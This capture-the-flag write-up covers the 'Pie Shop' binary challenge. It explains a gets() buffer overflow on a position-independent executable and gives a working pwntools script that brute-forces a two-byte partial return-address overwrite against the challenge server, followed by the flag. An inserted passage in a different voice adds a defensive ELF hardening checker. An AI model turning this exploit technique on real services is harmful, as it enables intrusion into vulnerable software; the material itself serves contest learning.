Pie Shop

Category: Binary
Points: 100
Description: I sure love pies (source)!

The biggest fluke of my LIFE. Okay, so this was another simple buffer overflow, again through a gets() call.

BUT

PIE (position independent executable) is enabled on this binary, which means the whole binary is loaded at a random base address, so the addresses of the functions inside it change from run to run. Kinda like ASLR, but applied to the executable itself.

So again I used gdb with a cyclic pattern to find the offset at which the saved return address (RIP) on the stack gets overwritten. It is 72 bytes.

Now I followed this video I found online, but basically the last two bytes of the flag() function's address never change. They are always 0x01a9, and the previous 3 bytes are random. So I literally just brute forced it: open a connection, check whether the overwrite hit the correct address and returned the flag, and if not, try again.
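The reason the low bytes stay put is that PIE only randomises the load base, and that base is page-aligned, so the low 12 bits of every address survive. Here is an added example (my code, not the writeup's or the challenge's) that reads the ELF64 header and program headers to report whether a binary actually has PIE, NX and RELRO enabled, the check a defender runs before shipping a binary; the two sample images are constructed inline and are not loadable.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3                      # e_type values
PT_INTERP, PT_GNU_STACK, PT_GNU_RELRO = 3, 0x6474E551, 0x6474E552
PF_X = 1                                    # segment flag: executable

def elf_hardening(data: bytes) -> dict:
    """Report PIE / NX / RELRO for a little-endian ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    # fixed header offsets: e_type @16, e_phoff @32, e_phentsize/e_phnum @54
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    has_interp = nx = relro = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:          # asks for a dynamic loader: an executable
            has_interp = True
        elif p_type == PT_GNU_STACK:     # stack is NX only if PF_X is absent;
            nx = not (p_flags & PF_X)    # no PT_GNU_STACK at all means executable
        elif p_type == PT_GNU_RELRO:
            relro = True
    # PIE = an ET_DYN executable. It only randomises the page-aligned load base,
    # so the low 12 bits of every function address are the same on every run.
    return {"pie": e_type == ET_DYN and has_interp, "nx": nx, "relro": relro}

def build_sample(e_type: int, stack_flags: int, relro: bool) -> bytes:
    """Constructed ELF64 header + program headers for testing (not loadable)."""
    phdrs = [(PT_INTERP, 4, 0, 0, 0, 0, 0, 1),
             (PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
    ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + bytes(7)   # ELF64, LE, v1, SysV
    hdr = struct.pack("<16sHHIQQQIHHHHHH", ident, e_type, 0x3E, 1, 0, 64, 0, 0,
                      64, 56, len(phdrs), 64, 0, 0)
    return hdr + b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)

if __name__ == "__main__":
    print("hardened:", elf_hardening(build_sample(ET_DYN, 6, True)))
    print("weak:    ", elf_hardening(build_sample(ET_EXEC, 7, False)))
```

Point it at a real file with `elf_hardening(open(path, "rb").read())`; a binary reported as PIE and NX but without a stack canary is exactly the kind this writeup's gets() overflow goes after.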

Now I tried this locally and it took up to 8000 attempts to get the right address. So making 8000 connections was not going to be fun, but I tried it anyway and got it on like the 130th try! HOW LUCKY!

Now I'm not sure if pwntools was available on the online shell; it might have made it a lot quicker, but anyway, got the flag.

Here is my python code:

from pwn import *

#p = process("./pie_shop")
#p = gdb.debug("./pie_shop")
#p = remote("shell.actf.co", 19306)

output = b""
count = 1

# 72 bytes of padding reach the saved return address
junk = b"A" * 72
# partial overwrite: only the two low bytes of flag()'s address are sent
# (little-endian, so 0x01a9 goes on the wire as \xa9\x01)
flag = b"\xa9\x01"
#flag = p64(0x5555555551a9)   # full address when run under gdb with ASLR off
payload = junk + flag

# keep reconnecting until the randomised base happens to match
while b"actf{" not in output:
    p = remote("shell.actf.co", 19306)
    #p = process("./pie_shop")
    print(" attempt #%d" % count)
    count += 1
    p.recvuntil(b"want?")
    p.sendline(payload)
    output = p.recvall()
    p.close()
print(output)

Don't hate pls, I'm never gonna be able to reproduce the exploit!

FLAG:

actf{a_different_kind_of_pie}
